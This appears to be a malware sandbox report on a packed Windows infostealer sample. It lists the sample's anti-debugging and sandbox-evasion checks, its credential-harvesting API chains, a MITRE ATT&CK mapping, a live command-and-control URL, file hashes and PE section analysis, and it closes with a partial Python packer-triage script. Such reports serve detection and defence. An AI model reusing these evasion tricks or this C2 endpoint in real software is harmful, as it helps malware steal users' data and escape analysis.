                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE02E7 second address: 4BE02ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE02ED second address: 4BE02F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE02F1 second address: 4BE0300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE0300 second address: 4BE0304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE0304 second address: 4BE030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE030A second address: 4BE038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0D4D733D3h 0x00000009 xor ch, 0000006Eh 0x0000000c jmp 00007FB0D4D733D9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FB0D4D733D0h 0x00000018 add al, FFFFFFE8h 0x0000001b jmp 00007FB0D4D733CBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FB0D4D733CBh 0x0000002e call 00007FB0D4D733D8h 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BE038B second address: 4BE03C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0D4C188CEh 0x00000008 pop eax 0x00000009 mov edx, 5F912266h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0D4C188D8h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EB1A9E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 106014D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 105EA3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EAF062 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1072EFF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00C638B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C64910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00C5DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00C5E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00C64570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00C5ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C516D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00C63EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C5F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00C5BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00C5DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C51160 GetSystemInfo,ExitProcess | 0_2_00C51160
                Source: file.exe, file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1798536060.0000000000853000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWVq
                Source: file.exe, 00000000.00000002.1798536060.0000000000825000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000853000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarePJ
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13549
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13552
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13571
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13603
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13563
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C545C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00C545C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00C69860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C69750 mov eax, dword ptr fs:[00000030h] | 0_2_00C69750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00C678E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00C69600
                Source: file.exe, file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: KRWProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00C67B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00C67980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00C67850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00C67A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.c50000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.c50000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (one row per column position; a leading number is the count of matched signatures for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Antivirus detection, submitted sample:
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches in the three remaining tables (dropped files, unpacked PE files and domains in the report's standard layout).
Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
Contacted domains: No contacted domains info
Contacted URLs:
Name | Malicious | Antivirus detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs found in memory (strings are listed exactly as carved from the dumps, trailing bytes included; dump A = file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmp; dump B = file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp):
Name | Source | Malicious | Antivirus detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php; | dump A | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpk | dump A | true | | unknown
http://185.215.113.37 | dump B, dump A | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpx9 | dump A | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpY | dump B | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php65d60108622213 | dump A | true | | unknown
http://185.215.113.37S | dump B | true | | unknown
Contacted public IPs:
IP | Domain | Country | ASN | ASN name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528404
                            Start date and time:2024-10-07 22:07:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 85
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • VT rate limit hit for: file.exe
                            No simulations
Context for 185.215.113.37 (other submissions that contacted this IP; all detected as malicious):
Sample | Threat name | Context
file.exe | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | Stealc | 185.215.113.37/e2b1563c6670f193.php
xwZfYpo16i.exe | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.37/e2b1563c6670f193.php
c3KH2gLNrM.exe | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Context for ASN WHOLESALECONNECTIONSNL (other submissions that contacted this ASN; all detected as malicious):
Sample | Threat name | Context IP
file.exe | Stealc, Vidar | 185.215.113.37
file.exe | Stealc | 185.215.113.37
file.exe | Stealc | 185.215.113.37
file.exe | Stealc, Vidar | 185.215.113.37
file.exe | Stealc | 185.215.113.37
file.exe | Stealc, Vidar | 185.215.113.37
file.exe | Stealc | 185.215.113.37
file.exe | Stealc | 185.215.113.37
xwZfYpo16i.exe | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.103
c3KH2gLNrM.exe | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
No context
No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949692276929249
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'909'760 bytes
                            MD5:ff372169f2c0278490593f4abbfcceac
                            SHA1:82f8e81327c943fe7e1ca4b2cf16116052f419f8
                            SHA256:25020e52a52db73e1c53c36bca3aa4dd40c57f609637745546e6e56076a4e439
                            SHA512:16b5c23f562357948b4c24dce754a9aef62e95dfde050fae3bd64a4f1209b5fe2959a43df6e1a58ed17d812eaa224dd61b4b4358f40c57b04e4ace412a7b1a1c
                            SSDEEP:24576:Uv0jJzuw043T5Mu9FLgHJMUJJCBxI+aVFntmqDteTfHwSrVT15yTwJXbMs5LwqOT:Uvkv4ucptmwVhmVT/wSrVTKCws67xbT
                            TLSH:38953376EC920159F404A27DCB7A6A32379490E44AEF9E0BB78E513C4477F1D2DD2A4C
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0xac6000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint disassembly (linear decode starting at 0xac6000 in .taggant; only the leading jmp is an instruction the program executes, the following bytes are not code and decode to fillers such as add byte ptr [eax], al, which is how 00 00 disassembles):
                            jmp 00007FB0D501434Ah
                            lar ebx, word ptr [00000000h]
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            pop ds
                            add byte ptr [eax+000000FEh], ah
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data directories:
Name | Virtual address | Virtual size | In section
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_EXPORT, RESOURCE, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED | 0x0 | 0x0 |
PE sections:
Name | Virtual address | Virtual size | Raw size | MD5 | Xored PE | ZLIB complexity | File type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 38b5bef26b3283632fbe463e910ab0a0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2bb000 | 0x200 | d48a75597b5a8f150e288efdd4d3b574 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
npcvtcpc | 0x519000 | 0x1ac000 | 0x1ac000 | 3869010ca5a94d9d61c8ce87f01b2329 | False | 0.9952324127482477 | data | 7.9550669046081595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
stnuknqq | 0x6c5000 | 0x1000 | 0x600 | 766e46542c14c5513db7a3970e5b67b4 | False | 0.61328125 | data | 5.212113955480753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6c6000 | 0x3000 | 0x2200 | e88f016bced83aeb36d8ffd0f076f563 | False | 0.08122702205882353 | DOS executable (COM) | 1.0816670451500379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Reading the table: the two unnamed sections reserve far more virtual space than the file backs (0x25b000 against 0x22800 bytes, and 0x2bb000 against 0x200) and are both writable and executable, which is the space a packer unpacks into at run time; npcvtcpc holds 0x1ac000 bytes at entropy 7.96, the compressed or encrypted payload; the entry point 0xac6000 (RVA 0x6c6000) falls inside .taggant rather than in any code section; and .rsrc is empty (its MD5 is the digest of zero bytes).
Static imports (DLL: functions):
kernel32.dll: lstrcpy
That single entry is the whole import table; every other API is resolved at run time through the LoadLibraryA/GetProcAddress chain visible in the execution graph further down.
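The packer indicators read off the two tables above can be checked mechanically. The script below is an added example (mine, not code from the report or from Joe Security): the section rows, entry point and import table are transcribed from the report, and the numeric thresholds (entropy 7.0, a 10:1 virtual-to-raw ratio, at most 3 imports) are assumptions of this example rather than values the report uses.

```python
# Added example, not from the Joe Sandbox report: packer triage from the section
# headers, entry point and import table that the report lists for this sample.
# The rows are transcribed from the report; the thresholds are assumptions.
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Section:
    name: str                  # "" where the header had no name
    vaddr: int
    vsize: int
    rawsize: int
    entropy: Optional[float]   # None where the report printed "unknown"
    flags: frozenset


RWX = frozenset({"EXECUTE", "READ", "WRITE"})

# Transcribed from the report's section table (characteristics abbreviated).
SECTIONS = [
    Section("",         0x1000,   0x25b000, 0x22800,  None,               RWX),
    Section(".rsrc",    0x25c000, 0x1000,   0x0,      0.0,                frozenset({"READ", "WRITE"})),
    Section(".idata",   0x25d000, 0x1000,   0x200,    0.9064079259880791, frozenset({"READ", "WRITE"})),
    Section("",         0x25e000, 0x2bb000, 0x200,    None,               RWX),
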